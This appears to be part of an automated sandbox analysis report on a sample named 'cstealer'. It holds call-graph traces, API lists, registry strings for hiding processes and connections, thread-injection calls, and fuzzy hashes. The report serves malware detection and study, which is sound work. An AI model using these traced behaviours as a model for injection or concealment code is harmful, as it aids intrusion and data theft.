88446->88447 88448 7ff6957e2635 memcpy_s 88447->88448 88464 7ff6957e2810 88448->88464 88450 7ff6957e2679 memcpy_s 88468 7ff6957f7ee4 88450->88468 88453 7ff6957f7ee4 37 API calls 88454 7ff6957e26ac 88453->88454 88455 7ff6957f7ee4 37 API calls 88454->88455 88456 7ff6957e26b9 DialogBoxIndirectParamW 88455->88456 88457 7ff6957e26ef __std_exception_destroy 88456->88457 88458 7ff6957e2715 88457->88458 88459 7ff6957e270f DeleteObject 88457->88459 88460 7ff6957e2721 DestroyIcon 88458->88460 88461 7ff6957e2727 88458->88461 88459->88458 88460->88461 88462 7ff6957ec010 _wfindfirst32i64 8 API calls 88461->88462 88463 7ff6957e2738 88462->88463 88463->88322 88465 7ff6957e2835 88464->88465 88476 7ff6957f5508 88465->88476 88469 7ff6957f7f02 88468->88469 88472 7ff6957e269f 88468->88472 88469->88472 88499 7ff695801344 37 API calls 2 library calls 88469->88499 88471 7ff6957f7f31 88471->88472 88473 7ff6957f7f51 88471->88473 88472->88453 88500 7ff6957fb6b8 17 API calls _wfindfirst32i64 88473->88500 88477 7ff6957f5562 88476->88477 88478 7ff6957f5587 88477->88478 88480 7ff6957f55c3 88477->88480 88494 7ff6957fb5cc 37 API calls 2 library calls 88478->88494 88495 7ff6957f38c0 48 API calls _invalid_parameter_noinfo 88480->88495 88482 7ff6957f55b1 88484 7ff6957ec010 _wfindfirst32i64 8 API calls 88482->88484 88483 7ff6957f56a4 88498 7ff6957fb700 11 API calls 2 library calls 88483->88498 88487 7ff6957e2854 88484->88487 88486 7ff6957f565e 88486->88483 88488 7ff6957f56ca 88486->88488 88489 7ff6957f5679 88486->88489 88492 7ff6957f5670 88486->88492 88487->88450 88488->88483 88490 7ff6957f56d4 88488->88490 88496 7ff6957fb700 11 API calls 2 library calls 88489->88496 88497 7ff6957fb700 11 API calls 2 library calls 88490->88497 88492->88483 88492->88489 88494->88482 88495->88486 88496->88482 88497->88482 88498->88482 88499->88471 88502 7ff6957e2d66 88501->88502 88503 7ff6957e1ee0 49 API calls 88502->88503 88505 7ff6957e2d99 88503->88505 88504 7ff6957e30ca 88505->88504 88553 7ff6957e3e80 49 API calls 88505->88553 88507 7ff6957e2e07 88554 7ff6957e3e80 49 API calls 88507->88554 88509 7ff6957e2e18 88510 7ff6957e2e75 88509->88510 88511 7ff6957e2e39 88509->88511 88513 7ff6957e3190 75 API calls 88510->88513 88555 7ff6957e3190 88511->88555 88514 7ff6957e2e73 88513->88514 88515 7ff6957e2eb4 88514->88515 88516 7ff6957e2ef6 88514->88516 88563 7ff6957e77b0 129 API calls 3 library calls 88515->88563 88518 7ff6957e3190 75 API calls 88516->88518 88520 7ff6957e2f20 88518->88520 88519 7ff6957e2ece 88521 7ff6957e3151 88519->88521 88522 7ff6957e2ed7 88519->88522 88523 7ff6957e3190 75 API calls 88520->88523 88530 7ff6957e2fbc 88520->88530 88570 7ff6957e2b10 59 API calls 2 library calls 88521->88570 88564 7ff6957e2b10 59 API calls 2 library calls 88522->88564 88526 7ff6957e2f52 88523->88526 88525 7ff6957e1ea0 59 API calls 88528 7ff6957e300f 88525->88528 88526->88530 88531 7ff6957e3190 75 API calls 88526->88531 88527 7ff6957e2ef1 88532 7ff6957ec010 _wfindfirst32i64 8 API calls 88527->88532 88528->88504 88534 7ff6957e1ee0 49 API calls 88528->88534 88530->88525 88541 7ff6957e30cf 88530->88541 88533 7ff6957e2f80 88531->88533 88535 7ff6957e2fb1 88532->88535 88533->88530 88537 7ff6957e2f84 88533->88537 88536 7ff6957e3037 88534->88536 88535->88034 88536->88521 88540 7ff6957e1ee0 49 API calls 88536->88540 88565 7ff6957e2b10 59 API calls 2 library calls 88537->88565 88543 7ff6957e3064 88540->88543 88544 7ff6957e3128 88541->88544 88567 7ff6957f5824 45 API calls 2 library calls 88541->88567 88543->88521 88545 7ff6957e1ee0 49 API calls 88543->88545 88544->88521 88568 7ff6957e2b10 59 API calls 2 library calls 88544->88568 88569 7ff6957e1700 135 API calls 2 library calls 88544->88569 88547 7ff6957e3091 88545->88547 88547->88521 88548 7ff6957e1a90 121 API calls 88547->88548 88549 7ff6957e30b3 88548->88549 88549->88541 88550 7ff6957e30b7 88549->88550 88566 7ff6957e2b10 59 API calls 2 library calls 88550->88566 88552->88034 88553->88507 88554->88509 88556 7ff6957e31c4 88555->88556 88571 7ff6957f52b4 88556->88571 88559 7ff6957e31fb 88561 7ff6957ec010 _wfindfirst32i64 8 API calls 88559->88561 88562 7ff6957e3219 88561->88562 88562->88514 88563->88519 88564->88527 88565->88527 88566->88504 88567->88541 88568->88544 88569->88544 88570->88504 88572 7ff6957f530e 88571->88572 88573 7ff6957f5333 88572->88573 88575 7ff6957f536f 88572->88575 88606 7ff6957fb5cc 37 API calls 2 library calls 88573->88606 88607 7ff6957f3540 49 API calls _invalid_parameter_noinfo 88575->88607 88577 7ff6957f535d 88580 7ff6957ec010 _wfindfirst32i64 8 API calls 88577->88580 88578 7ff6957f544c 88610 7ff6957fb700 11 API calls 2 library calls 88578->88610 88581 7ff6957e31ea 88580->88581 88581->88559 88589 7ff6957f65dc 88581->88589 88582 7ff6957f5406 88582->88578 88583 7ff6957f5470 88582->88583 88584 7ff6957f5421 88582->88584 88586 7ff6957f5418 88582->88586 88583->88578 88587 7ff6957f547a 88583->88587 88608 7ff6957fb700 11 API calls 2 library calls 88584->88608 88586->88578 88586->88584 88609 7ff6957fb700 11 API calls 2 library calls 88587->88609 88590 7ff6957f6605 88589->88590 88591 7ff6957f65f9 88589->88591 88636 7ff6957f5788 45 API calls __CxxCallCatchBlock 88590->88636 88611 7ff6957f5ef0 88591->88611 88594 7ff6957f662d 88597 7ff6957f663d 88594->88597 88637 7ff6957ffbd4 5 API calls __crtLCMapStringW 88594->88637 88595 7ff6957f65fe 88595->88559 88638 7ff6957f5d74 14 API calls 3 library calls 88597->88638 88599 7ff6957f6695 88600 7ff6957f66ad 88599->88600 88601 7ff6957f6699 88599->88601 88602 7ff6957f5ef0 69 API calls 88600->88602 88601->88595 88639 7ff6957fb700 11 API calls 2 library calls 88601->88639 88604 7ff6957f66b9 88602->88604 88604->88595 88640 7ff6957fb700 11 API calls 2 library calls 88604->88640 88606->88577 88607->88582 88608->88577 88609->88577 88610->88577 88612 7ff6957f5f0a 88611->88612 88613 7ff6957f5f27 88611->88613 88641 7ff6957f5c94 11 API calls _get_daylight 88612->88641 88613->88612 88614 7ff6957f5f3a CreateFileW 88613->88614 88616 7ff6957f5fa4 88614->88616 88617 7ff6957f5f6e 88614->88617 88645 7ff6957f64cc 46 API calls 3 library calls 88616->88645 88644 7ff6957f6044 59 API calls 3 library calls 88617->88644 88618 7ff6957f5f0f 88642 7ff6957f5cb4 11 API calls _get_daylight 88618->88642 88622 7ff6957f5f7c 88625 7ff6957f5f83 CloseHandle 88622->88625 88626 7ff6957f5f99 CloseHandle 88622->88626 88623 7ff6957f5fa9 88627 7ff6957f5fad 88623->88627 88628 7ff6957f5fd8 88623->88628 88624 7ff6957f5f17 88643 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88624->88643 88630 7ff6957f5f22 88625->88630 88626->88630 88646 7ff6957f5c28 11 API calls 2 library calls 88627->88646 88647 7ff6957f628c 51 API calls 88628->88647 88630->88595 88633 7ff6957f5fe5 88648 7ff6957f63c8 21 API calls _fread_nolock 88633->88648 88635 7ff6957f5fb7 88635->88630 88636->88594 88637->88597 88638->88599 88639->88595 88640->88595 88641->88618 88642->88624 88644->88622 88645->88623 88646->88635 88647->88633 88648->88635 88650 7ff6957f6918 88649->88650 88651 7ff6957f693e 88650->88651 88654 7ff6957f6971 88650->88654 88680 7ff6957f5cb4 11 API calls _get_daylight 88651->88680 88653 7ff6957f6943 88681 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88653->88681 88656 7ff6957f6984 88654->88656 88657 7ff6957f6977 88654->88657 88668 7ff6957fb9e0 88656->88668 88682 7ff6957f5cb4 11 API calls _get_daylight 88657->88682 88660 7ff6957e40b9 88660->88045 88662 7ff6957f69a5 88675 7ff695800da4 88662->88675 88663 7ff6957f6998 88683 7ff6957f5cb4 11 API calls _get_daylight 88663->88683 88666 7ff6957f69b8 88684 7ff6957f5b68 LeaveCriticalSection 88666->88684 88685 7ff6958011a8 EnterCriticalSection 88668->88685 88670 7ff6957fb9f7 88671 7ff6957fba54 19 API calls 88670->88671 88672 7ff6957fba02 88671->88672 88673 7ff695801208 _isindst LeaveCriticalSection 88672->88673 88674 7ff6957f698e 88673->88674 88674->88662 88674->88663 88686 7ff695800aa0 88675->88686 88678 7ff695800dfe 88678->88666 88680->88653 88682->88660 88683->88660 88687 7ff695800adb __vcrt_FlsAlloc 88686->88687 88696 7ff695800ca2 88687->88696 88701 7ff6958071a4 51 API calls 3 library calls 88687->88701 88689 7ff695800d79 88705 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88689->88705 88691 7ff695800cab 88691->88678 88698 7ff695807e8c 88691->88698 88693 7ff695800d0d 88693->88696 88702 7ff6958071a4 51 API calls 3 library calls 88693->88702 88695 7ff695800d2c 88695->88696 88703 7ff6958071a4 51 API calls 3 library calls 88695->88703 88696->88691 88704 7ff6957f5cb4 11 API calls _get_daylight 88696->88704 88706 7ff69580748c 88698->88706 88701->88693 88702->88695 88703->88696 88704->88689 88707 7ff6958074a3 88706->88707 88708 7ff6958074c1 88706->88708 88760 7ff6957f5cb4 11 API calls _get_daylight 88707->88760 88708->88707 88711 7ff6958074dd 88708->88711 88710 7ff6958074a8 88761 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88710->88761 88717 7ff695807a9c 88711->88717 88715 7ff6958074b4 88715->88678 88763 7ff6958077d0 88717->88763 88720 7ff695807b11 88795 7ff6957f5c94 11 API calls _get_daylight 88720->88795 88721 7ff695807b29 88783 7ff6957f8c58 88721->88783 88739 7ff695807b16 88796 7ff6957f5cb4 11 API calls _get_daylight 88739->88796 88752 7ff695807508 88752->88715 88762 7ff6957f8c30 LeaveCriticalSection 88752->88762 88760->88710 88764 7ff6958077fc 88763->88764 88772 7ff695807816 88763->88772 88764->88772 88808 7ff6957f5cb4 11 API calls _get_daylight 88764->88808 88766 7ff69580780b 88809 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88766->88809 88768 7ff6958078e5 88779 7ff695807942 88768->88779 88814 7ff6957fa92c 37 API calls 2 library calls 88768->88814 88769 7ff695807894 88769->88768 88812 7ff6957f5cb4 11 API calls _get_daylight 88769->88812 88772->88769 88810 7ff6957f5cb4 11 API calls _get_daylight 88772->88810 88773 7ff69580793e 88776 7ff6958079c0 88773->88776 88773->88779 88774 7ff6958078da 88813 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88774->88813 88815 7ff6957fb6b8 17 API calls _wfindfirst32i64 88776->88815 88778 7ff695807889 88811 7ff6957fb698 37 API calls _invalid_parameter_noinfo 88778->88811 88779->88720 88779->88721 88816 7ff6958011a8 EnterCriticalSection 88783->88816 88795->88739 88796->88752 88808->88766 88810->88778 88812->88774 88814->88773 88818 7ff6957f98c4 88817->88818 88821 7ff6957f93a0 88818->88821 88820 7ff6957f98dd 88820->88055 88822 7ff6957f93bb 88821->88822 88823 7ff6957f93ea 88821->88823 88832 7ff6957fb5cc 37 API calls 2 library calls 88822->88832 88831 7ff6957f5b5c EnterCriticalSection 88823->88831 88826 7ff6957f93db 88826->88820 88827 7ff6957f93ef 88828 7ff6957f940c 38 API calls 88827->88828 88829 7ff6957f93fb 88828->88829 88830 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88829->88830 88830->88826 88832->88826 88834 7ff6957f0773 88833->88834 88835 7ff6957f07a1 88833->88835 88844 7ff6957fb5cc 37 API calls 2 library calls 88834->88844 88837 7ff6957f0793 88835->88837 88843 7ff6957f5b5c EnterCriticalSection 88835->88843 88837->88059 88839 7ff6957f07b8 88840 7ff6957f07d4 72 API calls 88839->88840 88841 7ff6957f07c4 88840->88841 88842 7ff6957f5b68 _fread_nolock LeaveCriticalSection 88841->88842 88842->88837 88844->88837 88845 271dc675cf0 88846 271dc675cfd 88845->88846 88847 271dc675d09 88846->88847 88854 271dc675e1a 88846->88854 88848 271dc675d3e 88847->88848 88849 271dc675d8d 88847->88849 88850 271dc675d66 SetThreadContext 88848->88850 88850->88849 88851 271dc675e41 VirtualProtect FlushInstructionCache 88851->88854 88852 271dc675efe 88853 271dc675f1e 88852->88853 88867 271dc6743e0 VirtualFree 88852->88867 88863 271dc674df0 GetCurrentProcess 88853->88863 88854->88851 88854->88852 88857 271dc675f23 88858 271dc675f37 ResumeThread 88857->88858 88859 271dc675f77 88857->88859 88860 271dc675f6b 88858->88860 88868 271dc677940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry capture_previous_context 88859->88868 88860->88857 88862 271dc675fbf 88866 271dc674e0c 88863->88866 88864 271dc674e53 88864->88857 88865 271dc674e22 VirtualProtect FlushInstructionCache 88865->88866 88866->88864 88866->88865 88867->88853 88868->88862 88869 271dc67554d 88870 271dc675554 88869->88870 88871 271dc6755bb 88870->88871 88872 271dc675637 VirtualProtect 88870->88872 88873 271dc675663 GetLastError 88872->88873 88874 271dc675671 88872->88874 88873->88874 88875 271dc671abc 88881 271dc671628 GetProcessHeap 88875->88881 88877 271dc671ad2 Sleep SleepEx 88879 271dc671acb 88877->88879 88879->88877 88880 271dc671598 StrCmpIW StrCmpW 88879->88880 88926 271dc6718b4 9 API calls 88879->88926 88880->88879 88882 271dc671648 _invalid_parameter_noinfo 88881->88882 88927 271dc671268 GetProcessHeap 88882->88927 88884 271dc671650 88885 271dc671268 2 API calls 88884->88885 88886 271dc671661 88885->88886 88887 271dc671268 2 API calls 88886->88887 88888 271dc67166a 88887->88888 88889 271dc671268 2 API calls 88888->88889 88890 271dc671673 88889->88890 88891 271dc67168e RegOpenKeyExW 88890->88891 88892 271dc6718a6 88891->88892 88893 271dc6716c0 RegOpenKeyExW 88891->88893 88892->88879 88894 271dc6716ff RegOpenKeyExW 88893->88894 88895 271dc6716e9 88893->88895 88897 271dc671723 88894->88897 88898 271dc67173a RegOpenKeyExW 88894->88898 88931 271dc6712bc 11 API calls 2 library calls 88895->88931 88932 271dc67104c 4 API calls 2 library calls 88897->88932 88899 271dc671775 RegOpenKeyExW 88898->88899 88900 271dc67175e 88898->88900 88904 271dc6717b0 RegOpenKeyExW 88899->88904 88905 271dc671799 88899->88905 88933 271dc6712bc 11 API calls 2 library calls 88900->88933 88901 271dc6716f5 RegCloseKey 88901->88894 88909 271dc6717d4 88904->88909 88910 271dc6717eb RegOpenKeyExW 88904->88910 88934 271dc6712bc 11 API calls 2 library calls 88905->88934 88906 271dc671730 RegCloseKey 88906->88898 88907 271dc67176b RegCloseKey 88907->88899 88935 271dc6712bc 11 API calls 2 library calls 88909->88935 88913 271dc671826 RegOpenKeyExW 88910->88913 88914 271dc67180f 88910->88914 88911 271dc6717a6 RegCloseKey 88911->88904 88915 271dc671861 RegOpenKeyExW 88913->88915 88916 271dc67184a 88913->88916 88936 271dc67104c 4 API calls 2 library calls 88914->88936 88920 271dc671885 88915->88920 88921 271dc67189c RegCloseKey 88915->88921 88937 271dc67104c 4 API calls 2 library calls 88916->88937 88917 271dc6717e1 RegCloseKey 88917->88910 88938 271dc67104c 4 API calls 2 library calls 88920->88938 88921->88892 88922 271dc67181c RegCloseKey 88922->88913 88923 271dc671857 RegCloseKey 88923->88915 88925 271dc671892 RegCloseKey 88925->88921 88939 271dc686168 88927->88939 88929 271dc671283 GetProcessHeap 88930 271dc6712ae _invalid_parameter_noinfo 88929->88930 88930->88884 88931->88901 88932->88906 88933->88907 88934->88911 88935->88917 88936->88922 88937->88923 88938->88925 88940 271dc673ab9 88944 271dc673a06 88940->88944 88941 271dc673a70 88942 271dc673a56 VirtualQuery 88942->88941 88942->88944 88943 271dc673a8a VirtualAlloc 88943->88941 88945 271dc673abb GetLastError 88943->88945 88944->88941 88944->88942 88944->88943 88945->88941 88945->88944 88946 271dc64273c 88947 271dc64276a 88946->88947 88948 271dc6427c5 VirtualAlloc 88947->88948 88951 271dc6428d4 88947->88951 88950 271dc6427ec 88948->88950 88948->88951 88949 271dc642858 LoadLibraryA 88949->88950 88950->88949 88950->88951

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 00000271DC671628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction ID: 9da9c09ea11b973f36e3bb18168d8985121fb6f06b451637f1a977ffd48ce2a2
                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction Fuzzy Hash: 1371F27631AA1189EF309FA9E85879933B4FF44B88F401912DE4D57BA9EF38C464CB44
                                                                                                                                                            Function 00007FF6957E1000 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 293windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 53 7ff6957e1000-7ff6957e39b6 call 7ff6957f0750 call 7ff6957f0748 call 7ff6957e89b0 call 7ff6957f0748 call 7ff6957ebfb0 call 7ff6957f5ae0 call 7ff6957f66e8 call 7ff6957e1ea0 71 7ff6957e3b5f 53->71 72 7ff6957e39bc-7ff6957e39cc call 7ff6957e3f00 53->72 74 7ff6957e3b64-7ff6957e3b84 call 7ff6957ec010 71->74 72->71 77 7ff6957e39d2-7ff6957e39e5 call 7ff6957e3dd0 72->77 77->71 81 7ff6957e39eb-7ff6957e3a12 call 7ff6957e7d70 77->81 84 7ff6957e3a54-7ff6957e3a7c call 7ff6957e8250 call 7ff6957e1ca0 81->84 85 7ff6957e3a14-7ff6957e3a23 call 7ff6957e7d70 81->85 96 7ff6957e3a82-7ff6957e3a98 call 7ff6957e1ca0 84->96 97 7ff6957e3b2d-7ff6957e3b3e 84->97 85->84 91 7ff6957e3a25-7ff6957e3a2b 85->91 93 7ff6957e3a2d-7ff6957e3a35 91->93 94 7ff6957e3a37-7ff6957e3a51 call 7ff6957f576c call 7ff6957e8250 91->94 93->94 94->84 110 7ff6957e3a9a-7ff6957e3ab2 call 7ff6957e2b10 96->110 111 7ff6957e3ab7-7ff6957e3aba 96->111 100 7ff6957e3b92-7ff6957e3b95 97->100 101 7ff6957e3b40-7ff6957e3b47 97->101 104 7ff6957e3bab-7ff6957e3bc3 call 7ff6957e8de0 100->104 105 7ff6957e3b97-7ff6957e3b9d 100->105 101->100 106 7ff6957e3b49-7ff6957e3b51 call 7ff6957e8b80 101->106 120 7ff6957e3bc5-7ff6957e3bcc 104->120 121 7ff6957e3bce-7ff6957e3bd5 SetDllDirectoryW 104->121 112 7ff6957e3b9f-7ff6957e3ba9 105->112 113 7ff6957e3bdb-7ff6957e3be8 call 7ff6957e6ff0 105->113 122 7ff6957e3b53 106->122 123 7ff6957e3b85-7ff6957e3b90 call 7ff6957e14e0 106->123 110->71 111->97 116 7ff6957e3abc-7ff6957e3ad3 call 7ff6957e4060 111->116 112->104 112->113 128 7ff6957e3c33-7ff6957e3c38 call 7ff6957e6f70 113->128 129 7ff6957e3bea-7ff6957e3bf7 call 7ff6957e6ca0 113->129 131 7ff6957e3ad5-7ff6957e3ad8 116->131 132 7ff6957e3ada-7ff6957e3b06 call 7ff6957e84c0 116->132 126 7ff6957e3b5a call 7ff6957e2b10 120->126 121->113 122->126 123->71 123->100 126->71 139 7ff6957e3c3d-7ff6957e3c40 128->139 129->128 145 7ff6957e3bf9-7ff6957e3c08 call 7ff6957e6800 129->145 138 7ff6957e3b15-7ff6957e3b2b call 7ff6957e2b10 131->138 132->97 146 7ff6957e3b08-7ff6957e3b10 call 7ff6957f097c 132->146 138->71 142 7ff6957e3d11-7ff6957e3d19 call 7ff6957e34a0 139->142 143 7ff6957e3c46-7ff6957e3c50 139->143 151 7ff6957e3d1e-7ff6957e3d20 142->151 147 7ff6957e3c53-7ff6957e3c5d 143->147 158 7ff6957e3c0a-7ff6957e3c16 call 7ff6957e6780 145->158 159 7ff6957e3c29-7ff6957e3c2e call 7ff6957e6a50 145->159 146->138 153 7ff6957e3c5f-7ff6957e3c64 147->153 154 7ff6957e3c66-7ff6957e3c68 147->154 151->71 156 7ff6957e3d26-7ff6957e3d55 call 7ff6957e8b50 call 7ff6957e81e0 call 7ff6957e7d70 call 7ff6957e3600 151->156 153->147 153->154 160 7ff6957e3cb1-7ff6957e3cb7 154->160 161 7ff6957e3c6a-7ff6957e3c8d call 7ff6957e1ee0 154->161 190 7ff6957e3d7a-7ff6957e3daa call 7ff6957e8290 call 7ff6957e6a50 call 7ff6957e6f70 156->190 191 7ff6957e3d57-7ff6957e3d74 PostMessageW GetMessageW 156->191 158->159 172 7ff6957e3c18-7ff6957e3c27 call 7ff6957e6e40 158->172 159->128 163 7ff6957e3cdc-7ff6957e3cf1 call 7ff6957e3600 call 7ff6957e3440 call 7ff6957e35f0 160->163 164 7ff6957e3cb9-7ff6957e3cd6 PostMessageW GetMessageW 160->164 161->71 175 7ff6957e3c93-7ff6957e3c9d 161->175 185 7ff6957e3cf6-7ff6957e3d0c call 7ff6957e6a50 call 7ff6957e6f70 163->185 164->163 172->139 177 7ff6957e3ca0-7ff6957e3caf 175->177 177->160 177->177 185->74 200 7ff6957e3dac-7ff6957e3db3 call 7ff6957e7f50 190->200 201 7ff6957e3db8-7ff6957e3dc2 call 7ff6957e1e70 190->201 191->190 200->201 201->74
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                            • API String ID: 2647325126-1544818733
                                                                                                                                                            • Opcode ID: c58022dafef2daa97a35f7e98ade3fced550866366077b7cc029f32b0c993c89
                                                                                                                                                            • Instruction ID: de8e0c548993f7f47575c4b1db8cc1327bee43c35e005f64ed431a28b46d9ed9
                                                                                                                                                            • Opcode Fuzzy Hash: c58022dafef2daa97a35f7e98ade3fced550866366077b7cc029f32b0c993c89
                                                                                                                                                            • Instruction Fuzzy Hash: 9DC16F21B0C79691EA35EB31A5512FD62D1EF44F84F4041B6EA4ECB6A6DE2CFE098710
                                                                                                                                                            Function 00007FF695807A9C Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 387 7ff695807a9c-7ff695807b0f call 7ff6958077d0 390 7ff695807b11-7ff695807b1a call 7ff6957f5c94 387->390 391 7ff695807b29-7ff695807b33 call 7ff6957f8c58 387->391 398 7ff695807b1d-7ff695807b24 call 7ff6957f5cb4 390->398 396 7ff695807b35-7ff695807b4c call 7ff6957f5c94 call 7ff6957f5cb4 391->396 397 7ff695807b4e-7ff695807bb7 CreateFileW 391->397 396->398 400 7ff695807c34-7ff695807c3f GetFileType 397->400 401 7ff695807bb9-7ff695807bbf 397->401 414 7ff695807e6a-7ff695807e8a 398->414 407 7ff695807c92-7ff695807c99 400->407 408 7ff695807c41-7ff695807c7c GetLastError call 7ff6957f5c28 CloseHandle 400->408 404 7ff695807c01-7ff695807c2f GetLastError call 7ff6957f5c28 401->404 405 7ff695807bc1-7ff695807bc5 401->405 404->398 405->404 412 7ff695807bc7-7ff695807bff CreateFileW 405->412 410 7ff695807ca1-7ff695807ca4 407->410 411 7ff695807c9b-7ff695807c9f 407->411 408->398 421 7ff695807c82-7ff695807c8d call 7ff6957f5cb4 408->421 417 7ff695807caa-7ff695807cff call 7ff6957f8b70 410->417 418 7ff695807ca6 410->418 411->417 412->400 412->404 426 7ff695807d01-7ff695807d0d call 7ff6958079d8 417->426 427 7ff695807d1e-7ff695807d4f call 7ff695807550 417->427 418->417 421->398 426->427 434 7ff695807d0f 426->434 432 7ff695807d55-7ff695807d97 427->432 433 7ff695807d51-7ff695807d53 427->433 436 7ff695807db9-7ff695807dc4 432->436 437 7ff695807d99-7ff695807d9d 432->437 435 7ff695807d11-7ff695807d19 call 7ff6957fb878 433->435 434->435 435->414 439 7ff695807dca-7ff695807dce 436->439 440 7ff695807e68 436->440 437->436 438 7ff695807d9f-7ff695807db4 437->438 438->436 439->440 443 7ff695807dd4-7ff695807e19 CloseHandle CreateFileW 439->443 440->414 444 7ff695807e4e-7ff695807e63 443->444 445 7ff695807e1b-7ff695807e49 GetLastError call 7ff6957f5c28 call 7ff6957f8d98 443->445 444->440 445->444
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1617910340-0
                                                                                                                                                            • Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                                                                                            • Instruction ID: f91bee172fd8944fde339852eda1f98a28153eacfb765be0aa7ba2c084433dcd
                                                                                                                                                            • Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
                                                                                                                                                            • Instruction Fuzzy Hash: CBC1AE32B29A5685EB20CF74C5906BC37A1EB49FA8B014266DE1EDB3D5CF38E955C700
                                                                                                                                                            Function 00007FF6957E8D00 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                            • String ID:
